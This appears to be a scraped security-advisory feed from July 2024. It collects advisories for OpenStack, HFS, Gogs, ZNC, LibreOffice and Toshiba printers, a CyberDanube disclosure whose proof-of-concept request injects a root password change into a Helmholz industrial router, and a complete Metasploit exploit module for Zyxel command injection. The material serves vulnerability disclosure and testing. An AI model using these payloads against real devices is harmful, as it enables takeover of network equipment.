An issue was discovered in OpenStack Cinder through 24.0.0, Glance before 28.0.2, and Nova before 29.0.3. Arbitrary file access can occur via custom QCOW2 external data. By supplying a crafted QCOW2 image that references a specific data file path, an authenticated user may convince systems to return a copy of that file's contents from the server, resulting in unauthorized access to potentially sensitive data. All Cinder and Nova deployments are affected; only Glance deployments with image conversion enabled are affected.

**OpenStack Cinder, Glance, and Nova vulnerable to arbitrary file access**

Moderate severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-r4v4-w9pv-6fph: OpenStack Cinder, Glance, and Nova vulnerable to arbitrary file access

rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

**rejetto HFS vulnerable to OS Command Execution by remote authenticated users**

Critical severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-5f4x-hwv2-w9w2: rejetto HFS vulnerable to OS Command Execution by remote authenticated users

Gogs through 0.13.0 allows argument injection during the tagging of a new release. This vulnerability is still unfixed as of the time of this advisory being published.

**Gogs allows argument injection during the tagging of a new release**

High severity GitHub Reviewed Published Jul 4, 2024 to the GitHub Advisory Database • Updated Jul 5, 2024

GHSA-8mm6-wmpp-mmm3: Gogs allows argument injection during the tagging of a new release

Gogs through 0.13.0 allows argument injection during the previewing of changes.

**Gogs allows argument injection during the previewing of changes**

Critical severity GitHub Reviewed Published Jul 4, 2024 to the GitHub Advisory Database • Updated Jul 5, 2024

GHSA-hf29-9hfh-w63j: Gogs allows argument injection during the previewing of changes

Gogs through 0.13.0 allows deletion of internal files. 

**Gogs allows deletion of internal files**

Critical severity GitHub Reviewed Published Jul 4, 2024 to the GitHub Advisory Database • Updated Jul 5, 2024

GHSA-2vgj-3pvg-xh4w: Gogs allows deletion of internal files

Helmholz Industrial Router REX100 and MBConnectline mbNET.mini versions 2.2.11 and below suffer from a command injection vulnerability.

CyberDanube Security Research 20240703-0  
-------------------------------------------------------------------------------  
                title| Authenticated Command Injection  
              product| Helmholz Industrial Router REX100  
                     | MBConnectline mbNET.mini  
   vulnerable version| <= 2.2.11  
        fixed version| 2.2.13  
           CVE number| CVE-2024-5672  
               impact| High  
             homepage| https://www.helmholz.de/  
                     | https://mbconnectline.com/  
                found| 2024-05-08  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Helmholz is your specialist when it comes to sophisticated products for your  
automation projects. With current, clever system solutions from Helmholz, the  
high demands placed on industrial networks in times of increasing automation  
can be met both reliably and efficiently - including a high level of operating  
convenience. The broad product spectrum ranges from a decentralized I/O system  
to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT  
remote machine access."

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions  
-------------------------------------------------------------------------------  
Helmholz Industrial Router REX100 <= 2.2.11  
MBConnectline mbNET.mini <= 2.2.11

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Authenticated Command Injection (CVE-2024-5672)  
A command injection was identified on the webserver. This vulnerability can  
only be exploited if a user is authenticated on the web interface. This way,  
an attacker can invoke commands and is able to get full control over the whole  
device.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Authenticated Command Injection (CVE-2024-5672)  
The following GET request changes the password for the root user and returns  
the process list of the device.

-------------------------------------------------------------------------------  
GET /cgi-bin/ping;echo$IFS'root:password'|chpasswd;ps;.sh HTTP/1.1  
Host: 192.168.25.11  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Authorization: Basic aGVsbWhvbHo6cm91dGVy  
Connection: close  
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------  
HTTP/1.0 200 OK  
This is haserl version 0.8.0  
This program runs as a cgi interpeter, not interactively.  
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>

Password for 'root' changed  
  PID USER       VSZ STAT COMMAND  
    1 root      2292 S    init  
    2 root         0 SW   [kthreadd]  
    3 root         0 SW   [ksoftirqd/0]  
    4 root         0 SW   [events/0]  
    5 root         0 SW   [khelper]  
    8 root         0 SW   [async/mgr]  
[...]

Solution  
-------------------------------------------------------------------------------  
Update to latest version: 2.2.13

Workaround  
-------------------------------------------------------------------------------  
None

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends Helmholz customers to upgrade the firmware to the latest  
version available and to restrict network access to the management interface of  
the device.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-05-15: Contacting Helmholz via psirt@helmholz.de.  
2024-05-15: Receiving security contact for MBConnectline.  
2024-05-21: Contact stated they are working on a fix.  
2024-06-13: Received advisory from contact and assigned CVE number.  
2024-07-01: Contact sends out final release date.  
2024-07-03: Coordinated release of advisory with CERT@VDE.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF S. Dietz / @2024

Helmholz Industrial Router REX100 / MBConnectline mbNET.mini 2.2.11 Command Injection

Debian Linux Security Advisory 5725-1 - Johannes Kuhn discovered that messages and channel names are not properly escaped in the modtcl module in ZNC, a IRC bouncer, which could result in remote code execution via specially crafted messages.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5725-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : zncCVE ID         : CVE-2024-39844Debian Bug     : 1075729Johannes Kuhn discovered that messages and channel names are notproperly escaped in the modtcl module in ZNC, a IRC bouncer, which couldresult in remote code execution via specially crafted messages.For the oldstable distribution (bullseye), this problem has been fixedin version 1.8.2-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8.2-3.1+deb12u1.We recommend that you upgrade your znc packages.For the detailed security status of znc please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/zncFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmaFtdJfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SD/w/9GnF+OQrjFxg2waLPlyE25kUbjXQUN1XkSyJO44eVlpLl8C2QJHx1w6f++9WENFPxksEE5XcXi/tbdNw5haqvkWv8AvnQ8w0YAQzT9/p5US9Osm5WEky2XPhjinvpQCSm19rUEKYhaU0PlTf3xIoxtI3SifTF0dQNv9WKRP2kBbSKnUYPITpXSz87qgfqHZB/EW8IOBQ6hOn4DPGwtLGad3nqdPUij1PO5YRh2I/CjU9etj0JJtFSHowgg5d5P6vdmbCSQ02OB8NGD/qeJtgou62GPRnRkYacXZSD/x+znwfoRdJZhp/VbhRaPzGLWIwt6g0TX/VJ+NiK5mQ9JkAo78dVJUWpOmjtlRzisGD6OwZtEtuEul60E3d5YS++IPkVZvy1yEZuChWwGtWwJA9u4kU3Yss4qbayQzXKS9tN1ZZnHIGaWE2zDekXhVf9/xpU6WPOeqVfiqeR0OoVnbVuh5zlZXqFupa5dCaXlyJDyXDAVDfuK4WwZK1dODwBkYsjY4sxPfzFQ0ANTLorhqEpVrE8okpiVmkISG+sdqNXRbmQN8TN9D7P34/NS13+arq3/fTQTZFPKMgT37mKXs15XjTPpTlgTOwkoZWR36klZDvY7mbtyqjdifBxE9LstG9iXAXnwTum0s+NnEovBAOq9gkgu7Ahw45RIqmf0BRHF/w==zbCH-----END PGP SIGNATURE-----

Debian Security Advisory 5725-1

103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

Ubuntu Security Notice 6877-1 - It was discovered that LibreOffice incorrectly performed TLS certificate verification when the LibreOfficeKit library is being used by third-party components. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6877-1  
July 04, 2024

libreoffice vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10

Summary:

LibreOffice could be made to expose sensitive information.

Software Description:  
- libreoffice: Office productivity suite

Details:

It was discovered that LibreOffice incorrectly performed TLS certificate  
verification when the LibreOfficeKit library is being used by third-party  
components. A remote attacker could possibly use this issue to obtain  
sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libreoffice                     4:24.2.4-0ubuntu0.24.04.2

Ubuntu 23.10  
   libreoffice                     4:7.6.7-0ubuntu0.23.10.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6877-1  
   CVE-2024-5261

Package Information:  
   https://launchpad.net/ubuntu/+source/libreoffice/4:24.2.4-0ubuntu0.24.04.2  
   https://launchpad.net/ubuntu/+source/libreoffice/4:7.6.7-0ubuntu0.23.10.3

Ubuntu Security Notice USN-6877-1

This Metasploit module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module's documentation for more details.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel parse_config.py Command Injection',        'Description' => %q{          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.          The affected firmware versions depend on the device module, see this module's documentation for more details.          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.          If you run into any issues testing this in a real environment we kindly ask you raise an issue in          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose        },        'Author' => [          'SSD Secure Disclosure technical team', # discovery          'jheysel-r7' # Msf module        ],        'References' => [          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],          [ 'CVE', '2023-33012']        ],        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Privileged' => true,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [ 'Automatic Target', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-01-24',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot        }      )    )    register_options(      [        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),      ]    )  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')    })    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?    if res.code == 200      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)      if product_match && version_match        product = product_match[1]        version = version_match[1]        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))          return CheckCode::Appears("Product: #{product}, Version: #{version}")        else          return CheckCode::Safe("Product: #{product}, Version: #{version}")        end      end    end    CheckCode::Unknown('Version and product info were unable to be determined.')  end  def on_new_session(session)    super    command_output = ''    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.    if session.type.to_s.eql? 'meterpreter'      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""    elsif session.type.to_s.eql? 'shell'      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"    end    if command_output.include?('success')      print_good('The GRE interface was successfully removed.')    else      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')    end  end  def exploit    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.    filename = rand_text_alpha(1)    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"    command = payload.raw    command += ' '    command += <<~CMD      2>/var/log/ztplog 1>/var/log/ztplog      (sleep 10 && /bin/rm -rf #{payload_filepath}) &    CMD    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"    file_write_pload = "option proto vti\n"    file_write_pload += "option #{command};exit\n"    file_write_pload += "option name 1\n"    config = Base64.strict_encode64(file_write_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    print_status('Attempting to upload the payload via QSR file write...')    file_write_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end    register_files_for_cleanup(payload_filepath)    print_good("File write was successful, uploaded: #{payload_filepath}")    cmd_injection_pload = "option proto gre\n"    cmd_injection_pload += "option name 0\n"    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"    cmd_injection_pload += "option netmask 24\n"    cmd_injection_pload += "option gateway 0\n"    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"    config = Rex::Text.encode_base64(cmd_injection_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    cmd_injection_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.    if payload_instance.connection_type == 'none'      cmd_output_res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')      })      if cmd_output_res&.body && !cmd_output_res.body.empty?        output = cmd_output_res.body.split("</head>\n<body>")[1]        output = output.split("</body>\n</html>")[0]        output = output.gsub("\n\n<br>", '')        output = output.gsub("[IPC]IPC result: 1\n", '')        print_good("Command output: #{output}")      else        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")      end    end    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end  endend

Latest News